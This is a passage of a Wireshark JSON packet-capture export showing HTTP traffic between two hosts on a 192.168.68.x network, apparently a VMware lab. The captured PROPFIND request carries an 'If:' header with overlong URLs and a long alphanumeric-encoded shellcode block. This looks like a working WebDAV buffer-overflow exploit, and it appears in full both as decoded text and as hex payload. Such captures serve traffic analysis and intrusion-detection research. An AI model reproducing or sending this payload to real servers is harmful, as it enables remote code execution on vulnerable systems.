><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/xPjoemShBtJnXrKfpCmDYPgKwqGobzDelhpbbLwVXALsYeRFXzWCZuISLoRCUsgKiKPzLiwLhbnosdQRseoALvkoCbafBmjLBIgtECdGc<47><63><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "185"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.490628000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.490628000",
|
||
"frame.time_delta": "0.000009000",
|
||
"frame.time_delta_displayed": "0.010614000",
|
||
"frame.time_relative": "16.741568000",
|
||
"frame.number": "194",
|
||
"frame.len": "337",
|
||
"frame.cap_len": "337",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "323",
|
||
"ip.id": "0x0000a79c",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x000088b1",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "46435",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "46435",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "40",
|
||
"tcp.len": "271",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "3191026418",
|
||
"tcp.nxtseq": "1720",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "3713588564",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x00005aa2",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:0a:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:0a:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868298",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000602000",
|
||
"tcp.analysis.bytes_in_flight": "1719",
|
||
"tcp.analysis.push_bytes_sent": "1719"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001384000",
|
||
"tcp.time_delta": "0.000009000"
|
||
},
|
||
"tcp.payload": "70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "193",
|
||
"tcp.segment": "194",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1719",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:45:67:78:51:79:52:45:6d:74:4e:75:47:4b:70:6c:41:6f:77:75:55:71:48:4b:77:6f:6e:72:72:79:41:6a:44:6f:74:54:7a:69:4f:44:72:4f:63:4c:6a:7a:43:4c:47:74:65:6c:76:5a:4e:41:6c:6e:59:70:55:50:50:43:64:4c:63:50:46:49:65:46:43:6d:6a:61:75:73:52:59:71:7a:58:42:72:43:48:7a:45:54:41:51:67:73:69:44:77:66:46:78:6a:54:64:78:44:e7:a5:b4:e7:a5:99:e7:91:b6:e6:b5:9a:e5:a5:8a:e5:a1:8f:e6:b9:83:e5:91:ab:e5:a5:ab:e6:a1:94:e4:bd:a6:e4:ad:88:e5:89:87:e7:9d:b7:e6:ad:8f:e7:a1:b4:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:ad:b1:e6:89:91:e6:95:83:e7:a5:a6:e4:85:a6:e5:99:ad:e4:89:af:e4:a9:ab:e6:a5:aa:e7:95:94:e5:85:ae:e4:a9:8e:e4:ad:86:e6:bd:84:e7:99:a7:e4:b5:ba:e6:bd:ba:e4:9d:a9:e4:a1:86:e5:89:93:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:46:78:69:43:6e:65:4e:4d:66:6c:42:5a:4a:4c:61:4f:42:68:67:6a:74:52:47:73:5a:64:61:76:47:59:43:5a:51:79:49:6a:76:74:69:79:62:61:53:62:76:52:5a:6f:57:42:68:54:4b:59:4c:5a:4c:71:59:4e:46:6f:65:74:78:54:52:44:4d:63:48:69:49:71:44:44:62:58:51:4e:48:69:47:42:44:52:57:53:54:4b:43:55:48:47:61:6d:73:6e:69:58:77:51:54:48:e7:95:8e:e7:99:a4:e6:91:b0:e4:85:82:e4:99:8c:e4:95:b4:e7:89:95:e6:a1:a7:e4:89:ab:e7:9d:95:e6:b9:8b:e7:8d:a4:e5:a1:a4:e4:a5:93:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e5:a1:b1:e6:a5:b8:e6:91:b4:e5:a9:ac:e1:8f:80:e6:a0:83:e5:85:99:e6:a5:ad:e6:95:9a:e7:a9:8c:e4:89:a3:e6:b9:b2:e6:85:ba:e5:95:92:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/EgxQyREmtNuGKplAowuUqHKwonrryAjDotTziODrOcLjzCLGtelvZNAlnYpUPPCdLcPFIeFCmjausRYqzXBrCHzETAQgsiDwfFxjTdxD<78><44><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/FxiCneNMflBZJLaOBhgjtRGsZdavGYCZQyIjvtiybaSbvRZoWBhTKYLZLqYNFoetxTRDMcHiIqDDbXQNHiGBDRWSTKCUHGamsniXwQTH<54><48><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPB